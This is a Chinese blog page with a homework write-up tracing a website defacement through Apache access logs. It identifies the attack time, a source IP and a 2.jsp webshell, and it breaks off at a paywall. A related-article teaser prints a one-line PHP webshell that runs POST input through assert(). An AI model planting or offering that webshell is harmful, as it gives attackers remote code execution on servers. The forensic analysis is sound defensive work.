作业6:Web 攻击溯源

最新推荐文章于 2025-09-04 03:44:28 发布
原创 最新推荐文章于 2025-09-04 03:44:28 发布 · 1.1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分析了2018年2月23日晚黑客M篡改X单位网站首页图片的事件,通过日志追踪发现攻击发生时间为21:10左右,涉及IP地址183.62.9.42。重点揭示了黑客尝试访问的Webshell——2.jsp,并推测Webshell植入可能始于2017年9月22日。

信息安全实践作业6:Web 攻击溯源

事情情况:
某天晚上,X 单位的网站首页图片(banner_home.jpg)被胆大妄为的黑客 M 篡改了,管理员发现问题后第一时间关停了 Web 服务器,几天后提取了全部日志。(日志见另附件)

根据提供的日志进行分析得到以下内容:

  1. 黑客 M 篡改网站首页图片事件发生的日期是什么?

    根据 log 文件,不难发现这是 Apache 日志,根据 Apache 访问日志格式可得,最后一个数字表示发送给客户端的总字节数。当网站首页图片被更改后,服务端发送给客户端的字节数应当会发生改变。用 vscode 查询 banner_home.jpg 查找发送字节数发生变化的地方。可以看到在如图所示处,请求 banner_home.jpg 服务端发送的字节数从50428 变为 37756
    在这里插入图片描述
    图中的访问日志格式:

    • 远程主机 IP :表明访问网站的是谁。
    • 请求时间:用方括号包围,而且采用“公用日志格式”或者“标准英文格式”。 时间信息最后的“+0800”表示服务器所处时区位于UTC之后的8小时。
    • 方法+资源+协议:表明服务器收到的是一个什么请求。
    • 状态代码:请求是否成功,或者遇到了什么样的错误。大多数时候,这项值是200,它表示服务器已经成功地响应浏览器的请求,一切正常。
    • 发送字节数:表示发送给客户端的总字节数。

    从下图可以看到 2018.2.23 21:02 发送字节数还为 50428 ,到

最低0.47元/天 解锁文章
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 三十五.恶意代码攻击检测及恶意样本分析
热门推荐
杨秀璋的专栏
12-26 1万+
本文主要结合作者的《系统安全前沿》作业,相关论文及绿盟李东宏老师的博客,从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识。在学术界方面,用类似于综述来介绍攻击追踪溯源的不同方法;在产业界方面,主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。关于攻击溯源的博客和论文都比较少,希望这篇文章对您有所帮助,如果文章中存在错误或理解不到位的地方,还请告知作者与海涵~
Web 攻击溯源:探寻网络攻击的源头
m0_57836225的博客
10-21 1037
例如,数据分析师可以对大量的日志和流量数据进行统计分析,安全运维人员可以对系统的运行状态进行监控和维护,逆向工程师可以对恶意样本进行逆向分析,安全分析师可以综合各种信息进行溯源画像。例如,如果已知某个攻击者经常使用某种特定的攻击手法,当在溯源过程中发现类似的手法时,可以更快地锁定攻击者的身份。Web 攻击溯源是指在遭受 web 攻击后,通过分析各种数据和信息,如日志、流量、样本等,追溯攻击行为的源头,包括攻击者的身份、攻击所使用的方法和工具,以及攻击的各个阶段和目的。
信息安全专业实训心得 day3
qq_62422995的博客
05-12 507
Web入侵的溯源分析:通过实际操作,我们使用Wireshark捕获攻击者的流量,分析攻击者的 IP、攻击时间、攻击方法等,进而进行攻击者的溯源分析。通过溯源分析,我们可以找到攻击者的真实 IP、攻击者的行为轨迹和攻击手段,并采取相应的措施进行防御。拒绝服务攻击Dos和分布式拒绝服务攻击DDoS的原理:通过实际操作,我了解到Dos攻击是指攻击者通过淹没服务器或网络的资源,使 在实际操作中,我们使用工具进行模拟攻击,并通过Wireshark捕获流量,分析攻击特征。
Web入侵溯源分析
qq_69100706的博客
04-17 1134
Web入侵的溯源分析是一个系统性的过程,涉及从攻击痕迹中收集证据、分析攻击手法、追踪攻击源头,并最终确定攻击者的身份和动机。
中睿天下-睿眼WEB攻击溯源系统-产品白皮书.pdf
05-17
中睿天下-睿眼WEB攻击溯源系统-产品白皮书:「攻击溯源」是基于「攻击者视角」构建的新一代安全防护体系。凭借近15年攻防实 战经验,从攻击者的视角获取对抗未知威胁的洞察力,中睿天下为用户的安全团队赋能,追 踪溯源、深入洞察每次攻击的详细过程,实现有效的「精准防护」。
服务器被入侵了?反手溯源出入侵者画像【网络安全】
HBohan的博客
03-07 1万+
手机上发来服务器被入侵的消息,这令人感到一脸懵,这个服务器也不是啥重要东西,上面啥也没有怎么还会被搞?被人搞了那也不能示弱了,
通过服务器日志溯源定位web应用攻击路径
Enweitech Software Works
07-03 2965
无论是我们使用的个人计算机还是服务器都为我们提供了强大的日志记录功能。例如系统日志,可以为我们记录系统硬件、软件和系统问题的信息,用户可以通过它来检查错误发生的原因,或者寻找受到攻击攻击者留下的痕迹。 而服务器日志,则主要包括访问日志和错误日志。访问日志记录了该服务器所有的请求的过程,主要记录的是客户的各项信息,如访问时间、内容、地址等。错误日志则记录服务器出错的细节等数据。同时,这些
墨者学院 - WebShell代码分析溯源(第2题)
多崎巡礼的博客
07-31 826
<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
anti-honeypot:检测并阻断WEB蜜罐的Chrome插件
其中,WEB蜜罐作为蓝队实施反制的关键技术手段之一,已被广泛部署于各类模拟漏洞环境、虚假服务或伪造攻击入口中,用以诱导攻击者暴露其真实身份信息,如IP地址、浏览器指纹、Cookie数据乃至登录凭证等。 在实际...
面向溯源取证的网络攻击工具痕迹分析技术与实现_何尾风.pdf
09-09
面向溯源取证的网络攻击工具痕迹分析技术与实现_何尾风
智能数字资产追踪系统数据安全:AI架构师的加密与溯源策略
最新发布
移动开发前沿的博客
09-04 1180
想象你有一个装满黄金的保险箱(数字资产),你需要:①确保没人能偷走黄金(机密性);②知道黄金有没有被动过(完整性);③需要时能快速找到黄金(可用性);④如果黄金被动了,能查到谁干的(不可否认性)。智能数字资产追踪系统就是这个"保险箱+监控+侦探"的结合体,但数字世界的"黄金"(数据)更脆弱——它能被瞬间复制、篡改且不留痕迹。加密策略(防止偷和看)和溯源策略(防止改和查),以及AI如何让这两套策略更聪明、更高效。范围覆盖从底层数学原理到实际代码实现,再到金融、供应链等真实场景的应用。核心概念。
web论文】追踪溯源
小张同学的博客
01-03 2541
追踪溯源就转换为如下一些问题的求解∶ 1.攻击技术手段、战术方法与人员的关系(手法是否相似); 2.攻击资源之间、同时与人员的相似性(电脑、工具、Payload、后门、服务器等); 3.攻击人员的社交网络画像(昵称、邮箱、手机号、IP等); 4.不同网络资源中挖掘不同线索的相似性; 5.个人与团队成员、归属等方面关系挖掘; Web追踪溯源技术: Cookie 追踪 浏览器指纹 跨浏览器追踪 跨设备追踪 Ip追踪 域名/dns追踪 GPS/GIS追踪 匿名网络追踪 攻击手法等方面溯源 开源情报分析 网络攻击
Web技术溯源&进入微服务
衡与墨的博客
05-04 1011
前言 说学微服务说了一年半了,一直都没有真的去做,我是要反思的。 其实微服务的基础理论、结构,思想和意义都已经了解的很熟悉了,所差的就是实际的应用学习。选择学习的目标是spring cloud。dubbo太大太繁杂,而且应用不如cloud广泛。从长远来看,spring cloud的发展空间也更大。 spring cloud构建微服务的基础是spring boot,要学习spring cloud之前...
十年网安行业代表性案例出炉,中睿天下Web攻击溯源案例实力入选
zorelworld的博客
10-17 1510
ISC、数说安全基于案例客户多维度曝光、案例考评集多方共议、案例征集全领域触达、案例价值深层次剖析的四大运营机制,挖掘近十年中引领行业发展风向,具有重要借鉴意义与推广价值的数字安全典型案例,汇编《ISC 2022十年网安行业代表性案例》。
应对Web安全防护,溯源追踪攻击者。
2302_79706076的博客
07-03 927
随着时代的进行,互联网站走进千家万户,网络安全问题也逐渐提上日程,国家对网络安全也欲加重视。
5-Web安全——php木马后门分析(入侵溯源
网络安全
04-04 2783
由于最近在学习入侵溯源和应急响应这块的知识,本着先理论再实践的原则,应用现有所学的知识自己动手分析一个php大马。 先随便从网上下载一个php大马,扔到虚拟机里打开,得到如下信息: 看到上面有一大串乱码一样的字符串是不是头都到了,不要慌,我们一步一步分析。 简单的说一下,其实第二行的password是php大马的登录密码,重点在第7行的eval函数。可以看到eval函数中一大串字符串先是进行base64解密,然后又调用了gzinflate解压缩编码,我们将eval函数改为echo函数将..
服务器被入侵了,溯源全过程(实战)
diaobusi的博客
06-22 4096
黑客为什么之前一直以 ssh方式用“git”等账号连接,在19号之前都是显示账号不可用,为什么19号那天突然就创建了一个git账号并成功入侵?应急处理的方式太过于草率,简单除暴的关闭防火墙端口,如果是在生产环境中,要怎么去完美处理这类事件?对Linux的日志文件还不够熟悉,在翻阅日志时,只知道大概的方面,并不知道该何处入手分析?对linux后门不够了解。linux命令掌握的不够全面。址的SSH连接。你配置防火墙规则,例如限制特定IP地址或IP地址范围对SSH端口的访问。
网页3D溯源
webGL的专栏
03-11 585
      早期的web3D技术非常不成熟,比如Java Applet实现的简单交互式三维动画,不仅需要下载一个巨大的支持环境,而且画面非常粗糙,性能也很差。究其原因,就在于早期的这些交互式三维动画在做图形渲染时,并没有直接利用到图形硬件本身所带的加速功能,也就是,即使安装了性能很高的显卡,对于Web页面的交互式三维动画的显示也起不了什么作用。  后来,Adobe的Flash Player浏览
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值